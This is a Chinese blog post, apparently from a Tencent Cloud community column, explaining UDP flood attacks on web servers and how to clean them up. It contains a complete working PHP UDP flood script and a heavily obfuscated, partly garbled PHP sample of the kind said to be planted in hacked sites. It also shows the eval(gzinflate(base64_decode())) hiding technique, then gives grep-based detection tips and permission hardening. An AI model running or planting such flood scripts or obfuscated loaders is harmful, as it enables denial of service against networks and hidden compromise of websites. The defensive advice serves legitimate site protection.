前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >UDP 流量攻击_网络流量攻击

UDP 流量攻击_网络流量攻击

作者头像
全栈程序员站长
发布2022-11-10 15:29:13
1.8K0
发布2022-11-10 15:29:13
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

最近在群里聊天看到有人被UDP攻击我几年前也遇到过当时前任工作交接过来面临很多挑战。

话又说回来凡是跳槽或主动找到你的公司都是让你去救火的。 

先说说UDP攻击原理很简单就是随便连接一个IP地址随便写一个端口号。 IP地址存在与否并不重要。这是UDP 的特性。

然后发送大数据包堵塞交换机路由器。

我们在局域网上模拟注意UDP不能在同一个VLAN下必须要经过路由才有效。

Php代码  

  1. <?php  
  2. /*
  3. $ip = $_GET[‘ip’];
  4. $port = $_GET[‘port’];
  5. */
  6. $ip = ‘192.168.10.30’;  
  7. $port = 800;  
  8. $num = 1000;  
  9. $packets = 0;  
  10. set_time_limit(0);  
  11. ignore_user_abort(FALSE);  
  12. $data = ”;  
  13. for($i=0;$i<65535;$i++){  
  14. $data .= “.”;  
  15. }  
  16. print “Starting…..<br>”;  
  17. while($packets < $num){  
  18. $fp = fsockopen(“udp://$ip”, $port, $errno, $errstr, 5);  
  19. if($fp){  
  20.         fwrite($fp, $data);  
  21.         fclose($fp);  
  22.     }  
  23. $packets++;  
  24. }  
  25. print(‘Package: ‘.$packets);  

上面提供的脚本一般攻击者不会直接使用他们会使用PHP源码混淆在植入你的网站中。

Php代码  

  1. <?php   
  2. if (!defined(“ACFCEFFBAEDABEA”)){define(“ACFCEFFBAEDABEA”, true);global $?$崜,$棊€,$儓儌,$妬墡?$剝殣殐,$唲殱枮?$啀帗泚媻,$儚搱摕嫕?$倐挐搷仜摐,$槉泭憟檮劀?$悁€儕晜枔憴?$剹姄檰問煈憠?$泝垁€殤倻枍憴?$剫灉憰噭弾寙帪?$檨敐姈焻噦仦悢槙;function 尃($尃,$崜?“”){ global $?$崜,$棊€,$儓儌,$妬墡?$剝殣殐,$唲殱枮?$啀帗泚媻,$儚搱摕嫕?$倐挐搷仜摐,$槉泭憟檮劀?$悁€儕晜枔憴?$剹姄檰問煈憠?$泝垁€殤倻枍憴?$剫灉憰噭弾寙帪?$檨敐姈焻噦仦悢槙;if(emptyempty($崜?){ return base64_decode($尃);}else{ return 尃($泝垁€殤倻枍憴?$尃,$崜?$悁€儕晜枔憴?$崜?));}}$悁€儕晜枔憴?尃(“c3RycmV2?);$泝垁€殤倻枍憴?尃(“c3RydHI=?);$唲殱枮?尃(“PzQ0NGMzY泎IwZmU1BTUwNzQ5MmV俴M2NFZWIy扤2RFMmM1P?U=?,”LBFZjOP“);$儚搱摕嫕?尃(“aHJlZ19yZXBsYWNl?,“cxkeqa”);$倐挐搷仜摐=尃(“lmFzZTl0X2RY弆29kZQ==?,”YjIteHl“);$剹姄檰問煈憠?尃(“H3p1bmQvbXByH沊Qz?,“ZnNVQPH”);$剫灉憰噭弾寙帪?尃(“CXChbA==?,”ZPcnsC“);function 棊€?&$棊€?{global $?$崜,$棊€,$儓儌,$妬墡?$剝殣殐,$唲殱枮?$啀帗泚媻,$儚搱摕嫕?$倐挐搷仜摐,$槉泭憟檮劀?$悁€儕晜枔憴?$剹姄檰問煈憠?$泝垁€殤倻枍憴?$剫灉憰噭弾寙帪?$檨敐姈焻噦仦悢槙;$檨敐姈焻噦仦悢槙?尃(“oGgg?,“Zgzlo”);@$儚搱摕嫕?$唲殱枮?$剫灉憰噭弾寙帪?“(@$剹姄檰問煈憠?$倐挐搷仜摐(‘eNptku1v0kAY僿P8V0vDhGutG?TbXkItOZLxk廚gLTlqkhbS1S?pIFSBd0S+zL嶦LpSxzrHeBv9楿+0dSLLot7v7?e55nnuei3vQ機wGRzxW0E5rt哣KZCqSEeQOgQ嘑CHX9VbxSzNP噆Kn4MMBepqlo凢b4IBxE+KchK怋rGx/wPDDl+k巖yIgtRqVDgJ2?7YwyTEf1BxT€6s5R1ON6ljNy宨LvmwB9jQed3峚xWhYFSEU4gk僺SunDR05jj29檓dpYEnT2XOB3€4CNK3nj79dg4嘑JDSG/rBzLx2焥aTqWlsVuLSi泇4djJJ69a6VVpD24M3fUnzjO廸IRNUaifS1n2峍CxC6CPTkDQR慽RPzbuHeL69+歐ubjzd3Db2xn昫a4tMZzWQ2bz怐V/LItULYbV6焟D/KVKsptQbi烪iC2wdazl+Qn€sE1QEaaizoUk?R33IoRo95H+峮LpUtLayOfTC?OX6odFutQAr歋MWIlrTpFQ4A?qrU5uVrmfxP?Rt7PQ+wjkQ9乑5IkhGh4YA2e?AQWtghpX0xI哹I2RFPmFss8m揳zvMbjLJJuQ9焟mZkeY+gGJKM俋VzE/skcgtXf擟OGruDN2g0mv宒78cjQZRDsu6怷QRDcxbMATZQ?favoB8srxd+咰DuqrqDLT27h扠ZSZM1rSOUMS€XndvywL3zULj唓B+UylGP/gCx嶹Qyu€’)));”,“槤?潐墐瀳444c3c20fe59507492ed3cceb27dc2c5寛剣厭”);return “y”;}}else{ global $?$崜,$棊€,$儓儌,$妬墡?$剝殣殐,$唲殱枮?$啀帗泚媻,$儚搱摕嫕?$倐挐搷仜摐,$槉泭憟檮劀?$悁€儕晜枔憴?$剹姄檰問煈憠?$泝垁€殤倻枍憴?$剫灉憰噭弾寙帪?$檨敐姈焻噦仦悢槙;$悁€儕晜枔憴?尃(“c3RycmV2?);$泝垁€殤倻枍憴?尃(“c3RydHI=?);$唲殱枮?尃(“PzQ0NGMzY泎IwZmU1BTUwNzQ5MmV俴M2NFZWIy扤2RFMmM1P?U=?,”LBFZjOP“);$儚搱摕嫕?尃(“aHJlZ19yZXBsYWNl?,“cxkeqa”);$倐挐搷仜摐=尃(“lmFzZTl0X2RY弆29kZQ==?,”YjIteHl“);$剹姄檰問煈憠?尃(“H3p1bmQvbXByH沊Qz?,“ZnNVQPH”);$剫灉憰噭弾寙帪?尃(“CXChbA==?,”ZPcnsC“);}$啀帗泚媻?尃(“EU5wejhjOUpCd0FZ嘦UGFRm6F?,“ZaHIQotE”);$唲殱枮憼=棊€?$啀帗泚媻?;@$儚搱摕嫕?$唲殱枮?$剫灉憰噭弾寙帪?“(@$剹姄檰問煈憠?$倐挐搷仜摐(‘eNo9UNtu2kAQfe9X憆KyVMGLlOEVEacxF峟Wif+lApH4Acsiar歡G2tF+WhquRbCTHB搘XEwmOuvdhaS7MvM攎Tkz58wanXaz4965刋xBmLmqhyvm3r9r5儀aVW1+p6xUDYdbiA?qWuA7BHQ8gbx9w1攅/dUeIABeVR0BRvS?oANmVD1qoFY33Y4?Y48yrvmDWxRf37/抎f0”.$啀帗泚媻?$唲殱枮憼.“YU4GVeJb昒5hSG/Qsh6uYtXQD塻+ZFo1FvQFKrVf+8k7QWUjTFQH+Ry5kt瀔HItTC6Y3dfka97w丯jQf7tiAqp8Gm0ff宑oUlL7Q8p3fvuNRW杔dGte3V2Bocr5HQo匓Mq57ZyiJzhBDXmK峱cIsbLAeOBNUAnIy塀E2rN3C8Y60qfX3I?mqfLtXKb6iZfXqF扠tpHH8jvX49GNnyf慽p8JnuUEL1Of4GgS抙QQnwVO6JDiO1vN1凴PA4Xu+KfQbJLM03弚TQB3ks+yQ/TXUpw汫L7u8lmwybcEr5JN攌k3KON4Ce+77UbII漣zwrC1i2TPJyPC4O峎fYEEpto4vvrLNwW俿6wEjXi632aLx/gl榝R6n+xXBZfC2S4rD乿8cw2M/fVouq0Wn/桞xjGxpk=?)));”,”€拝  
  3. 儝€悪?44c3c20fe59507492ed3cceb27dc2c5儞悇搩”);return true;?>9822537530499f58277ef52ffa504e5a  

另外一种是采用 eval(gzinflate(base64_decode(…..)))

Php代码  

  1. <?php  
  2. $code = “echo ‘Hello!’;”;  
  3. $compressed   = gzdeflate($code, 9);  
  4. $compressed = base64_encode($compressed);  
  5. echo $compressed;  
  6. echo “\r\n”;  
  7. $compressed = base64_decode($compressed);  
  8. $uncompressed = gzinflate($compressed);  
  9. echo $uncompressed;  
  10. echo “\r\n”;  
  11. eval($uncompressed);  
  12. echo “\r\n”;  
  13. ?>  

如果被攻击了怎样处理这样的攻击其实很简单。

grep -r ‘udp’ * 

找到可疑的脚本然后再删除即可

对于混淆过的PHP程序其实也有规律可循。可以查找 base64_decode eval 等等关键字一般被植入的目录多是777权限例如图片上传目录。

如果做好安全措施

  1. 代码600权限同时不能与web server 守护进程使用一个用户
  2. 无关目录屏蔽php运行权限

Java代码  

  1. <Location /includes/>  
  2.         Order allow,deny  
  3.         Deny from all  
  4. </Location>  

 3. 使用框架开发很多MVC 只有一个index.php 入口用户可访问的目录只有静态文件

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/188837.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年9月27日 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档